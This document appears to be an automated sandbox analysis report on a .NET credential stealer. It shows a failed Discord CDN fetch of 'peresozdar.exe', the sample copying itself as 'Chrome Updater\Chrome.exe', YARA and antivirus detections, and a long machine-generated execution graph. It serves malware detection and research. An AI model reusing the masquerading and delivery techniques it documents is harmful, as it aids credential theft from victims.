                                                                                    Set-Cookie: __cf_bm=yL0xoqhX9hFpZwCPWPHLrKxvKUJB9_pz5nNsFHUzYj4-1704353529-1-AfDOz8vQ8eEwDyJc/fRpbB/BZq0LT9iczSKSBvaqDkLA3opbMMhyBiKm9j3f2cPtjQog/jR+ry5RsF5s8Xp22j8=; path=/; expires=Thu, 04-Jan-24 08:02:09 GMT; domain=.discordapp.com; HttpOnly; Secure
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=mvYA5TuSmzeLNnth%2FSx1GO8udsfl0pSG3oiwSWmOxFqzxVmR1VKaJRUzq02dT18pDEiz5cqAEp7c8FZcfCFeSShJ9Lv9WW5Id1h27cYgzgq8fkCFvyAzj111kMIkT1JThVzxXQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Set-Cookie: _cfuvid=WOCxxQoCuIGMzHS22jupyq7Cc.53R67L5pitP7D58P8-1704353529162-0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                                                                                    Server: cloudflare
                                                                                    2024-01-04 07:32:09 UTC236INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 27 31 2e 30 27 20 65 6e 63 6f 64 69 6e 67 3d 27 55 54 46 2d 38 27 3f 3e 3c 45 72 72 6f 72 3e 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 4b 65 79 3c 2f 43 6f 64 65 3e 3c 4d 65 73 73 61 67 65 3e 54 68 65 20 73 70 65 63 69 66 69 65 64 20 6b 65 79 20 64 6f 65 73 20 6e 6f 74 20 65 78 69 73 74 2e 3c 2f 4d 65 73 73 61 67 65 3e 3c 44 65 74 61 69 6c 73 3e 4e 6f 20 73 75 63 68 20 6f 62 6a 65 63 74 3a 20 64 69 73 63 6f 72 64 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 3c 2f 44 65 74 61 69 6c 73 3e 3c 2f 45 72 72 6f 72 3e
                                                                                    Data Ascii: <?xml version='1.0' encoding='UTF-8'?><Error><Code>NoSuchKey</Code><Message>The specified key does not exist.</Message><Details>No such object: discord/attachments/1165051639040843819/1166800645383270420/peresozdar.exe</Details></Error>


                                                                                    Statistics

                                                                                    CPU Usage

                                                                                    Click to jump to process

                                                                                    Memory Usage

                                                                                    Click to jump to process

                                                                                    High Level Behavior Distribution

                                                                                    Click to dive into process behavior distribution

                                                                                    Behavior

                                                                                    Click to jump to process

                                                                                    System Behavior

                                                                                    General

                                                                                    Target ID:0
                                                                                    Start time:08:29:53
                                                                                    Start date:04/01/2024
                                                                                    Path:C:\Users\user\Desktop\LnSNtO8JIa.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:C:\Users\user\Desktop\LnSNtO8JIa.exe
                                                                                    Imagebase:0x670000
                                                                                    File size:419'840 bytes
                                                                                    MD5 hash:C4D558ACC94162490F5048E29FDBA96F
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:.Net C# or VB.NET
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.3365215653.0000000002B27000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                    Reputation:low
                                                                                    Has exited:false

                                                                                    General

                                                                                    Target ID:5
                                                                                    Start time:08:30:23
                                                                                    Start date:04/01/2024
                                                                                    Path:C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe"
                                                                                    Imagebase:0x700000
                                                                                    File size:419'840 bytes
                                                                                    MD5 hash:C4D558ACC94162490F5048E29FDBA96F
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:.Net C# or VB.NET
                                                                                    Antivirus matches:
                                                                                    • Detection: 100%, Avira
                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                    • Detection: 61%, ReversingLabs
                                                                                    • Detection: 60%, Virustotal, Browse
                                                                                    Reputation:low
                                                                                    Has exited:false

                                                                                    Disassembly

                                                                                    Reset < >

                                                                                      Execution Graph

                                                                                      Execution Coverage:3.9%
                                                                                      Dynamic/Decrypted Code Coverage:3.5%
                                                                                      Signature Coverage:7.5%
                                                                                      Total number of Nodes:956
                                                                                      Total number of Limit Nodes:163
                                                                                      execution_graph 103060 108c508 103061 108c52c 103060->103061 103064 108c6fa 103061->103064 103066 108c700 103064->103066 103065 108c651 103066->103065 103071 108ef2f 103066->103071 103076 108edc0 103066->103076 103081 108ed70 103066->103081 103086 108edb0 103066->103086 103072 108ef34 103071->103072 103091 108eff9 103072->103091 103095 108f008 103072->103095 103073 108ef48 103073->103065 103078 108edce 103076->103078 103077 108edfc 103077->103065 103078->103077 103079 108f008 LoadLibraryW 103078->103079 103080 108eff9 LoadLibraryW 103078->103080 103079->103077 103080->103077 103083 108edce 103081->103083 103082 108edfc 103082->103065 103083->103082 103084 108f008 LoadLibraryW 103083->103084 103085 108eff9 LoadLibraryW 103083->103085 103084->103082 103085->103082 103088 108edce 103086->103088 103087 108edfc 103087->103065 103088->103087 103089 108f008 LoadLibraryW 103088->103089 103090 108eff9 LoadLibraryW 103088->103090 103089->103087 103090->103087 103092 108f008 103091->103092 103099 108f090 103092->103099 103096 108f019 103095->103096 103098 108f090 LoadLibraryW 103096->103098 103097 108f06e 103097->103073 103098->103097 103102 108c1cc 103099->103102 103103 108f0b0 LoadLibraryW 103102->103103 103105 108f06e 103103->103105 103105->103073 103344 6c40ef10 103347 6c477a30 103344->103347 103346 6c40ef31 103346->103346 103348 6c477a49 103347->103348 103349 6c477a58 103347->103349 103373 6c4dedf0 23 API calls ___swprintf_l 103348->103373 103359 6c4dcc30 103349->103359 103351 6c477a5f 103351->103348 103354 6c477a71 103351->103354 103353 6c477b2e 103353->103346 103355 6c477acd 103354->103355 103371 6c493150 23 API calls ___swprintf_l 103354->103371 103358 6c477aed 103355->103358 103372 6c4e1120 23 API calls _mbstowcs_s 103355->103372 103358->103346 103360 6c4dcc4d 103359->103360 103361 6c4dcc35 103359->103361 103362 6c4dcc8c 103360->103362 103364 6c4dcc74 103360->103364 103366 6c4dcc5c 103360->103366 103374 6c4dedf0 23 API calls ___swprintf_l 103361->103374 103362->103351 103376 6c4dedf0 23 API calls ___swprintf_l 103364->103376 103365 6c4dcc46 103365->103351 103375 6c4dedf0 23 API calls ___swprintf_l 103366->103375 103369 6c4dcc85 103369->103351 103370 6c4dcc6d 103370->103351 103371->103354 103372->103358 103373->103353 103374->103365 103375->103370 103376->103369 103377 6c40e9d0 103380 6c4b6950 103377->103380 103379 6c40e9db 103381 6c4b695d 103380->103381 103382 6c4b6964 103380->103382 103381->103379 103383 6c4b696a 103382->103383 103388 6c4b699c 103382->103388 103437 6c4dedf0 23 API calls ___swprintf_l 103383->103437 103385 6c4b6976 103438 6c4dedf0 23 API calls ___swprintf_l 103385->103438 103386 6c4b69ca 103390 6c4b69e4 103386->103390 103440 6c4b8d10 30 API calls 2 library calls 103386->103440 103388->103386 103439 6c4b6a20 21 API calls ___swprintf_l 103388->103439 103403 6c4b88c0 103390->103403 103392 6c4b6991 103392->103379 103394 6c4b69ed 103395 6c4b6a07 103394->103395 103396 6c4b69f7 103394->103396 103441 6c4e1120 23 API calls _mbstowcs_s 103395->103441 103409 6c4479e0 103396->103409 103398 6c4b6a10 103400 6c4479e0 28 API calls 103398->103400 103402 6c4b6a19 103400->103402 103402->103379 103442 6c4b8960 23 API calls ___swprintf_l 103403->103442 103405 6c4e1a20 ___swprintf_l 23 API calls 103407 6c4b8958 103405->103407 103406 6c4b88d0 103406->103405 103408 6c4b8909 ___swprintf_l 103406->103408 103407->103394 103408->103394 103410 6c4479f5 103409->103410 103412 6c448079 103409->103412 103410->103412 103443 6c4478a0 103410->103443 103412->103379 103413 6c447a53 103415 6c447a63 103413->103415 103467 6c48ac50 103413->103467 103414 6c447a0b 103414->103413 103451 6c4c8e60 103414->103451 103482 6c4641d0 103415->103482 103422 6c4dc5d0 23 API calls 103433 6c447d36 ___swprintf_l 103422->103433 103423 6c447e3c 103424 6c4dc5d0 23 API calls 103423->103424 103425 6c447e47 103424->103425 103428 6c447e60 103425->103428 103527 6c4de180 23 API calls _mbstowcs_s 103425->103527 103426 6c447a74 ___swprintf_l 103493 6c4dc5d0 103426->103493 103434 6c447e86 ___swprintf_l 103428->103434 103528 6c4be1b0 23 API calls 2 library calls 103428->103528 103430 6c447c25 ___swprintf_l 103430->103422 103433->103423 103500 6c492a00 103433->103500 103496 6c47cbc0 103434->103496 103435 6c447f39 ___swprintf_l 103435->103412 103436 6c4dbd60 23 API calls 103435->103436 103436->103412 103437->103385 103438->103392 103439->103386 103440->103390 103441->103398 103442->103406 103446 6c4478bc 103443->103446 103444 6c447928 103529 6c4630e0 103444->103529 103446->103444 103535 6c4c7440 103446->103535 103448 6c447937 103450 6c447970 103448->103450 103549 6c4930d0 23 API calls 103448->103549 103450->103414 103452 6c4c8e6e 103451->103452 103453 6c4c7440 27 API calls 103452->103453 103455 6c4c8e87 103453->103455 103461 6c4c8efa 103455->103461 103560 6c4d1ee0 103455->103560 103457 6c4c8ec8 103458 6c4c8ed8 103457->103458 103459 6c4e1a20 ___swprintf_l 23 API calls 103457->103459 103460 6c4c8eed 103458->103460 103575 6c4d6560 103458->103575 103459->103458 103463 6c4e1a20 ___swprintf_l 23 API calls 103460->103463 103464 6c4e1a20 ___swprintf_l 23 API calls 103461->103464 103463->103461 103465 6c4c8f1d 103464->103465 103465->103414 103466 6c48ac50 23 API calls 103466->103457 103468 6c4dc5d0 23 API calls 103467->103468 103481 6c48ac99 103468->103481 103469 6c48adb2 103470 6c4dc5d0 23 API calls 103469->103470 103474 6c48adbe 103470->103474 103472 6c48adfc 103473 6c4dc5d0 23 API calls 103472->103473 103475 6c48ae05 103473->103475 103474->103472 103476 6c492a00 23 API calls 103474->103476 103477 6c4dc5d0 23 API calls 103475->103477 103476->103474 103478 6c48ae0d 103477->103478 103478->103415 103480 6c4e1a20 23 API calls ___swprintf_l 103480->103481 103481->103469 103481->103480 103605 6c46b810 23 API calls ___swprintf_l 103481->103605 103606 6c4a4300 23 API calls ___swprintf_l 103481->103606 103483 6c447a6d 103482->103483 103484 6c4641e5 ___swprintf_l 103482->103484 103487 6c4933b0 103483->103487 103484->103483 103486 6c4e1a20 ___swprintf_l 23 API calls 103484->103486 103607 6c4e1980 23 API calls ___swprintf_l 103484->103607 103486->103484 103489 6c4933cb ___swprintf_l 103487->103489 103490 6c493480 103487->103490 103488 6c4934ae 103488->103426 103489->103490 103492 6c4e1a20 ___swprintf_l 23 API calls 103489->103492 103490->103488 103608 6c4e1980 23 API calls ___swprintf_l 103490->103608 103492->103489 103494 6c4e1a20 ___swprintf_l 23 API calls 103493->103494 103495 6c4dc5e6 103494->103495 103495->103430 103497 6c47cbce 103496->103497 103498 6c47cc1b 103497->103498 103499 6c4e1a20 ___swprintf_l 23 API calls 103497->103499 103498->103435 103499->103498 103501 6c492c1b 103500->103501 103508 6c492a1f ___swprintf_l _mbstowcs_s 103500->103508 103502 6c492c2d 103501->103502 103503 6c492c22 103501->103503 103505 6c492c3c 103502->103505 103506 6c492c31 103502->103506 103621 6c482860 23 API calls 2 library calls 103503->103621 103507 6c492c2b 103505->103507 103623 6c4775a0 23 API calls ___swprintf_l 103505->103623 103622 6c464110 23 API calls ___swprintf_l 103506->103622 103609 6c492da0 103507->103609 103508->103501 103526 6c4e1a20 23 API calls ___swprintf_l 103508->103526 103617 6c4dc2e0 23 API calls ___swprintf_l 103508->103617 103618 6c495d10 23 API calls ___swprintf_l 103508->103618 103619 6c4a4300 23 API calls ___swprintf_l 103508->103619 103620 6c4a2ef0 23 API calls ___swprintf_l 103508->103620 103516 6c4e1a20 ___swprintf_l 23 API calls 103519 6c492c6b ___swprintf_l 103516->103519 103518 6c4e1a20 ___swprintf_l 23 API calls 103521 6c492ccb ___swprintf_l 103518->103521 103519->103518 103519->103521 103523 6c492d25 103521->103523 103624 6c4a2ef0 23 API calls ___swprintf_l 103521->103624 103522 6c4e1a20 ___swprintf_l 23 API calls 103524 6c492d8a 103522->103524 103523->103522 103525 6c492d32 ___swprintf_l 103523->103525 103524->103433 103525->103433 103526->103508 103527->103428 103528->103434 103531 6c4631ae ___swprintf_l 103529->103531 103534 6c4630fd 103529->103534 103530 6c46319f 103530->103531 103532 6c4e1a20 ___swprintf_l 23 API calls 103530->103532 103531->103448 103532->103531 103533 6c4e1980 23 API calls ___swprintf_l 103533->103534 103534->103530 103534->103533 103537 6c4c7459 103535->103537 103536 6c4c747a 103539 6c4c74ac 103536->103539 103555 6c4c7590 27 API calls 103536->103555 103537->103536 103554 6c4cb240 27 API calls 103537->103554 103540 6c4c754b 103539->103540 103556 6c4cff10 27 API calls 103539->103556 103550 6c4c7810 103540->103550 103544 6c4c7552 103544->103446 103545 6c4c7540 103558 6c4cb510 23 API calls ___swprintf_l 103545->103558 103547 6c4c74c8 103547->103545 103557 6c4d3bd0 27 API calls 103547->103557 103549->103450 103552 6c4c7825 103550->103552 103551 6c4c782e 103551->103544 103552->103551 103559 6c4d3bd0 27 API calls 103552->103559 103554->103536 103555->103539 103556->103547 103557->103545 103558->103540 103559->103551 103563 6c4d1eff 103560->103563 103579 6c4cd7b0 103563->103579 103566 6c4d1f83 103593 6c4d3f80 23 API calls ___swprintf_l 103566->103593 103569 6c4d1f8c 103594 6c4d3bd0 27 API calls 103569->103594 103570 6c4d1f8a 103571 6c4d6560 ___swprintf_l 23 API calls 103570->103571 103573 6c4d2010 103571->103573 103572 6c4e1a20 ___swprintf_l 23 API calls 103574 6c4c8eb7 103572->103574 103573->103572 103574->103457 103574->103466 103576 6c4d657b 103575->103576 103577 6c4d656b 103575->103577 103576->103460 103577->103576 103578 6c4e1a20 ___swprintf_l 23 API calls 103577->103578 103578->103576 103580 6c4cd8d1 103579->103580 103581 6c4cd7cc 103579->103581 103589 6c4d6dc0 103580->103589 103585 6c4cd860 103581->103585 103595 6c4cbb40 28 API calls 2 library calls 103581->103595 103583 6c4e1a20 ___swprintf_l 23 API calls 103584 6c4cd8c8 103583->103584 103586 6c4e1a20 ___swprintf_l 23 API calls 103584->103586 103585->103583 103586->103580 103587 6c4cd818 103587->103585 103596 6c4cd8e0 23 API calls ___swprintf_l 103587->103596 103590 6c4d1f7d 103589->103590 103591 6c4d6dd7 ___scrt_fastfail 103589->103591 103590->103566 103590->103569 103597 6c4d5940 103591->103597 103593->103570 103594->103570 103595->103587 103596->103585 103599 6c4d5950 103597->103599 103598 6c4d596b 103598->103590 103599->103598 103601 6c4d6020 103599->103601 103603 6c4d603c 103601->103603 103602 6c4d60f1 103602->103598 103603->103602 103604 6c4d6560 ___swprintf_l 23 API calls 103603->103604 103604->103603 103605->103481 103606->103481 103607->103484 103608->103488 103610 6c492c58 103609->103610 103611 6c492db6 ___swprintf_l 103609->103611 103610->103516 103610->103519 103613 6c4e1a20 ___swprintf_l 23 API calls 103611->103613 103615 6c492e36 103611->103615 103612 6c4e1a20 ___swprintf_l 23 API calls 103614 6c492e4a ___swprintf_l 103612->103614 103613->103611 103614->103610 103625 6c4a2ef0 23 API calls ___swprintf_l 103614->103625 103615->103612 103615->103614 103617->103508 103618->103508 103619->103508 103620->103508 103621->103507 103622->103507 103623->103507 103624->103523 103625->103610 103774 6c40f0a0 103775 6c40f0b5 GetCurrentProcessId 103774->103775 103776 6c40f0ab 103774->103776 103777 6c40f0e1 103775->103777 103778 6c40f0d6 103775->103778 103783 6c445590 103777->103783 103780 6c40f0f1 103781 6c40f10e 103780->103781 103847 6c40f4e0 23 API calls 103780->103847 103784 6c4455e4 103783->103784 103785 6c4455ba 103783->103785 103848 6c4491f0 103784->103848 103965 6c4dedf0 23 API calls ___swprintf_l 103785->103965 103788 6c4455d5 103788->103780 103789 6c4455ef 103790 6c4e1c20 _mbstowcs_s 23 API calls 103789->103790 103795 6c445a60 103789->103795 103800 6c445678 ___scrt_fastfail 103789->103800 103790->103800 103791 6c445a47 SI45d842f2d2322061 103792 6c445a86 103791->103792 103793 6c445a57 103791->103793 103792->103795 103975 6c445ac0 145 API calls _ValidateLocalCookies 103792->103975 103973 6c448210 28 API calls 2 library calls 103793->103973 103795->103780 103796 6c4456f7 103859 6c446330 103796->103859 103799 6c445800 103802 6c446330 _mbstowcs_s 23 API calls 103799->103802 103800->103791 103800->103796 103801 6c4456e7 103800->103801 103803 6c4e1a20 ___swprintf_l 23 API calls 103801->103803 103804 6c445817 103802->103804 103805 6c4456ed 103803->103805 103806 6c446330 _mbstowcs_s 23 API calls 103804->103806 103805->103791 103807 6c44582e 103806->103807 103808 6c446330 _mbstowcs_s 23 API calls 103807->103808 103809 6c445845 103808->103809 103810 6c446330 _mbstowcs_s 23 API calls 103809->103810 103811 6c44585f 103810->103811 103811->103805 103812 6c44587f 103811->103812 103813 6c44588b 103811->103813 103966 6c4450e0 23 API calls ___swprintf_l 103812->103966 103967 6c445cb0 31 API calls ___swprintf_l 103813->103967 103816 6c445889 103817 6c4458e7 103816->103817 103818 6c4458b2 _mbstowcs_s 103816->103818 103873 6c4c9010 103817->103873 103968 6c4de020 23 API calls _mbstowcs_s 103818->103968 103821 6c445903 103823 6c44590a 103821->103823 103826 6c445938 103821->103826 103822 6c4458d9 103824 6c4e1a20 ___swprintf_l 23 API calls 103822->103824 103823->103805 103969 6c4de180 23 API calls _mbstowcs_s 103823->103969 103824->103805 103917 6c48aa90 103826->103917 103828 6c445950 103829 6c48aa90 23 API calls 103828->103829 103830 6c44598c 103829->103830 103830->103805 103831 6c4459d6 103830->103831 103970 6c4de180 23 API calls _mbstowcs_s 103830->103970 103923 6c4859e0 SI70e4ec628dd7e188 103831->103923 103835 6c445a07 103971 6c4de180 23 API calls _mbstowcs_s 103835->103971 103836 6c4459ea 103836->103835 103838 6c445a6c 103836->103838 103925 6c43e2c0 103836->103925 103838->103835 103840 6c445a70 103838->103840 103839 6c445a13 103958 6c448b00 103839->103958 103974 6c47c890 23 API calls _mbstowcs_s 103840->103974 103842 6c445a28 103972 6c446ad0 23 API calls 2 library calls 103842->103972 103845 6c445a77 SI45d842f2d2322061 103845->103805 103845->103839 103847->103781 103849 6c449201 103848->103849 103850 6c449209 103848->103850 103849->103789 103852 6c449257 ___scrt_fastfail 103850->103852 103858 6c449329 103850->103858 103976 6c4e1e60 103850->103976 103853 6c449309 103852->103853 103852->103858 103991 6c4d7440 SIa069da76968b7553 103852->103991 103853->103858 103981 6c4e2780 103853->103981 103856 6c44931e 103856->103858 103992 6c4d7cf0 27 API calls 103856->103992 103858->103789 103860 6c44634b 103859->103860 103863 6c446384 _mbstowcs_s 103859->103863 103861 6c44635a 103860->103861 103860->103863 104018 6c4dedf0 23 API calls ___swprintf_l 103861->104018 103865 6c4463d6 103863->103865 103872 6c4463f2 _mbstowcs_s 103863->103872 103864 6c446375 103864->103799 104019 6c4de020 23 API calls _mbstowcs_s 103865->104019 103868 6c446474 103869 6c446490 103868->103869 104021 6c4de180 23 API calls _mbstowcs_s 103868->104021 103869->103799 103870 6c4463e3 103870->103799 103872->103868 104020 6c48b3a0 23 API calls 2 library calls 103872->104020 103874 6c4c904f 103873->103874 103875 6c4e1c20 _mbstowcs_s 23 API calls 103874->103875 103881 6c4c910b ___scrt_fastfail 103874->103881 103875->103881 103876 6c4c91e1 104052 6c3d11bc 5 API calls ___raise_securityfailure 103876->104052 103878 6c4c91f6 103878->103821 103879 6c4e1c20 _mbstowcs_s 23 API calls 103886 6c4c93b4 ___scrt_fastfail 103879->103886 103880 6c4c9379 103880->103879 103880->103886 103909 6c4c955f ___swprintf_l 103880->103909 103881->103876 103881->103880 103881->103881 103882 6c4c91c6 103881->103882 103883 6c4e1bb0 ___swprintf_l 23 API calls 103881->103883 103884 6c4c91db 103882->103884 103891 6c4c91fa 103882->103891 103883->103882 103885 6c4e1a20 ___swprintf_l 23 API calls 103884->103885 103885->103876 103886->103909 104022 6c4d1320 103886->104022 103887 6c4c96db 103888 6c4e1a20 ___swprintf_l 23 API calls 103887->103888 103890 6c4c96e1 103888->103890 103894 6c4e1a20 ___swprintf_l 23 API calls 103890->103894 103893 6c4c9260 103891->103893 103905 6c4c9203 ___swprintf_l 103891->103905 103892 6c4d1ee0 28 API calls 103892->103887 103895 6c4e1a20 ___swprintf_l 23 API calls 103893->103895 103907 6c4c9666 103894->103907 103896 6c4c926b 103895->103896 103898 6c4e1a20 ___swprintf_l 23 API calls 103896->103898 103897 6c4c932a 103901 6c4e1a20 ___swprintf_l 23 API calls 103897->103901 103899 6c4c9274 103898->103899 104053 6c3d11bc 5 API calls ___raise_securityfailure 103899->104053 103901->103880 103903 6c4c9717 103903->103821 103904 6c4c9286 103904->103821 103905->103897 103911 6c4c93c9 103905->103911 103906 6c4c9467 103908 6c4d23c0 23 API calls 103906->103908 103906->103909 104055 6c3d11bc 5 API calls ___raise_securityfailure 103907->104055 103908->103909 103909->103887 103909->103892 103909->103907 103910 6c4e1a20 ___swprintf_l 23 API calls 103912 6c4c93f9 103910->103912 103911->103910 103913 6c4e1a20 ___swprintf_l 23 API calls 103912->103913 103914 6c4c9402 103913->103914 104054 6c3d11bc 5 API calls ___raise_securityfailure 103914->104054 103916 6c4c9417 103916->103821 103918 6c48aa9f 103917->103918 103921 6c48ab03 103917->103921 103919 6c4e1bb0 ___swprintf_l 23 API calls 103918->103919 103922 6c48aac7 ___scrt_fastfail 103918->103922 103919->103922 103920 6c4e1c20 _mbstowcs_s 23 API calls 103920->103922 103921->103920 103921->103922 103922->103828 103924 6c4459dd SI45d842f2d2322061 103923->103924 103924->103835 103924->103836 104061 6c4645f0 103925->104061 103927 6c43e2df 103928 6c4491f0 27 API calls 103927->103928 103930 6c43e478 103927->103930 103929 6c43e2ef 103928->103929 103929->103930 103931 6c4e1bb0 ___swprintf_l 23 API calls 103929->103931 103930->103836 103932 6c43e2ff 103931->103932 103932->103930 104072 6c438e40 103932->104072 103934 6c43e340 103935 6c43e45a 103934->103935 103936 6c438e40 27 API calls 103934->103936 104100 6c439410 23 API calls ___swprintf_l 103935->104100 103937 6c43e35e 103936->103937 103937->103935 103940 6c438e40 27 API calls 103937->103940 103939 6c43e466 103941 6c4e1a20 ___swprintf_l 23 API calls 103939->103941 103942 6c43e37c 103940->103942 103943 6c43e46c 103941->103943 103942->103935 104092 6c437650 103942->104092 103943->103836 103946 6c43e39e SI70e4ec628dd7e188 103946->103935 103947 6c43e3b8 SI70e4ec628dd7e188 103946->103947 103947->103935 103948 6c43e3d2 SI70e4ec628dd7e188 103947->103948 103948->103935 103949 6c43e3e8 SI70e4ec628dd7e188 103948->103949 103949->103935 103950 6c43e3fe SI70e4ec628dd7e188 103949->103950 103950->103935 103951 6c43e414 103950->103951 104097 6c464590 23 API calls 2 library calls 103951->104097 103953 6c43e42a 103953->103930 104098 6c464590 23 API calls 2 library calls 103953->104098 103955 6c43e443 103955->103930 104099 6c436be0 23 API calls 103955->104099 103957 6c43e453 103957->103836 103959 6c448b28 103958->103959 103960 6c448b7f 103959->103960 103961 6c448b9f 103959->103961 103962 6c4e1a20 ___swprintf_l 23 API calls 103959->103962 103960->103842 103963 6c4e1bb0 ___swprintf_l 23 API calls 103961->103963 103964 6c448bed __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 103961->103964 103962->103961 103963->103964 103964->103842 103965->103788 103966->103816 103967->103816 103968->103822 103969->103805 103970->103831 103971->103839 103972->103805 103973->103795 103974->103845 103975->103795 103977 6c4e1e7e 103976->103977 103978 6c4e1e6f SIa069da76968b7553 103976->103978 103993 6c4dbc30 103977->103993 103978->103977 103979 6c4e1ed9 103979->103852 103982 6c4491f0 27 API calls 103981->103982 103983 6c4e278b 103982->103983 103984 6c4e27b0 103983->103984 103985 6c4e1bb0 ___swprintf_l 23 API calls 103983->103985 103984->103856 103986 6c4e2797 103985->103986 103986->103984 103987 6c4e1a20 ___swprintf_l 23 API calls 103986->103987 103988 6c4e27a4 103987->103988 104002 6c4d87a0 GetSystemInfo 103988->104002 103991->103853 103992->103858 103994 6c4dbc3b 103993->103994 103995 6c4dbc41 103993->103995 103994->103979 103996 6c4dbc8f 103995->103996 103997 6c4dbc5c HeapCreate 103995->103997 103996->103979 103997->103996 103998 6c4dbc6c 103997->103998 104001 6c4dedf0 23 API calls ___swprintf_l 103998->104001 104000 6c4dbc82 104000->103979 104001->104000 104011 6c4e25f0 104002->104011 104004 6c4d87d3 104005 6c4e25f0 26 API calls 104004->104005 104006 6c4d87df 104005->104006 104007 6c4e25f0 26 API calls 104006->104007 104008 6c4d87eb 104007->104008 104009 6c4e25f0 26 API calls 104008->104009 104010 6c4d87f7 104009->104010 104010->103856 104012 6c4491f0 27 API calls 104011->104012 104013 6c4e25fa 104012->104013 104016 6c4e262e 104013->104016 104017 6c4dedf0 23 API calls ___swprintf_l 104013->104017 104015 6c4e2624 104015->104004 104016->104004 104017->104015 104018->103864 104019->103870 104020->103868 104021->103869 104023 6c4d138e 104022->104023 104025 6c4d14bc 104022->104025 104023->104025 104031 6c4d13a1 104023->104031 104033 6c4d13c1 ___swprintf_l 104023->104033 104024 6c4d187a 104026 6c4d1884 104024->104026 104029 6c4e1a20 ___swprintf_l 23 API calls 104024->104029 104028 6c4e1bb0 ___swprintf_l 23 API calls 104025->104028 104025->104033 104038 6c4d14e4 104025->104038 104026->103906 104027 6c4e1bb0 ___swprintf_l 23 API calls 104030 6c4d1432 104027->104030 104028->104038 104029->104026 104030->104024 104034 6c4d143f ___swprintf_l ___scrt_fastfail 104030->104034 104032 6c4e1bb0 ___swprintf_l 23 API calls 104031->104032 104031->104033 104032->104033 104033->104024 104033->104026 104033->104027 104035 6c4e1a20 ___swprintf_l 23 API calls 104034->104035 104050 6c4d1657 104034->104050 104035->104050 104036 6c4d17a6 104042 6c4d6560 ___swprintf_l 23 API calls 104036->104042 104051 6c4d17b4 104036->104051 104037 6c4d15d6 104039 6c4e1a20 ___swprintf_l 23 API calls 104037->104039 104038->104026 104038->104033 104038->104037 104060 6c4450b0 23 API calls ___swprintf_l 104038->104060 104043 6c4d15dc 104039->104043 104040 6c4d23c0 23 API calls 104044 6c4d176a 104040->104044 104046 6c4d1867 104042->104046 104043->103906 104044->104036 104056 6c4d73b0 104044->104056 104045 6c4d15c9 104045->104033 104045->104037 104048 6c4e1a20 ___swprintf_l 23 API calls 104046->104048 104049 6c4d186d 104048->104049 104049->103906 104050->104036 104050->104040 104051->103906 104052->103878 104053->103904 104054->103916 104055->103903 104057 6c4d73c8 ___scrt_fastfail 104056->104057 104058 6c4d7350 23 API calls 104057->104058 104059 6c4d7402 104058->104059 104059->104036 104060->104045 104062 6c4dcc30 _mbstowcs_s 23 API calls 104061->104062 104063 6c4645ff 104062->104063 104064 6c46465b 104063->104064 104065 6c46460a 104063->104065 104103 6c4dedf0 23 API calls ___swprintf_l 104064->104103 104101 6c464700 23 API calls 2 library calls 104065->104101 104067 6c464676 104067->103927 104069 6c46462c 104071 6c464635 104069->104071 104102 6c4e1120 23 API calls _mbstowcs_s 104069->104102 104071->103927 104073 6c438e6a 104072->104073 104074 6c438eb4 104073->104074 104075 6c438e88 104073->104075 104077 6c438e9c ___swprintf_l 104074->104077 104079 6c438ed1 104074->104079 104105 6c439130 27 API calls 2 library calls 104074->104105 104076 6c438ea8 104075->104076 104104 6c439040 23 API calls ___swprintf_l 104075->104104 104076->103934 104077->103934 104081 6c438ee6 104079->104081 104085 6c438eea 104079->104085 104106 6c439130 27 API calls 2 library calls 104079->104106 104082 6c4491f0 27 API calls 104081->104082 104081->104085 104084 6c438eff 104082->104084 104084->104077 104086 6c4e1bb0 ___swprintf_l 23 API calls 104084->104086 104085->103934 104087 6c438f0b 104086->104087 104087->104077 104107 6c439570 27 API calls 2 library calls 104087->104107 104089 6c438f3a 104089->104077 104090 6c4e1a20 ___swprintf_l 23 API calls 104089->104090 104091 6c438f4a 104090->104091 104091->103934 104108 6c447230 104092->104108 104094 6c437677 104095 6c43769c 104094->104095 104096 6c447230 23 API calls 104094->104096 104095->103935 104095->103946 104096->104095 104097->103953 104098->103955 104099->103957 104100->103939 104101->104069 104102->104071 104103->104067 104104->104077 104105->104079 104106->104081 104107->104089 104109 6c4dcc30 _mbstowcs_s 23 API calls 104108->104109 104110 6c447249 104109->104110 104111 6c44724d 104110->104111 104114 6c447275 104110->104114 104141 6c4dedf0 23 API calls ___swprintf_l 104111->104141 104113 6c447268 104113->104094 104116 6c4e1c20 _mbstowcs_s 23 API calls 104114->104116 104117 6c4472b6 104114->104117 104116->104117 104118 6c4472e3 _mbstowcs_s 104117->104118 104123 6c447390 104117->104123 104121 6c44735b 104118->104121 104142 6c4e1120 23 API calls _mbstowcs_s 104118->104142 104120 6c44732c 104120->104118 104122 6c4e1a20 ___swprintf_l 23 API calls 104120->104122 104121->104094 104122->104118 104124 6c44758e 104123->104124 104127 6c4473aa 104123->104127 104152 6c4dedf0 23 API calls ___swprintf_l 104124->104152 104126 6c4475a9 104126->104120 104127->104124 104128 6c44740b 104127->104128 104129 6c447390 23 API calls 104128->104129 104134 6c447434 104128->104134 104132 6c447467 104129->104132 104131 6c4474c4 104137 6c4474e6 104131->104137 104140 6c447502 _mbstowcs_s 104131->104140 104132->104126 104133 6c447390 23 API calls 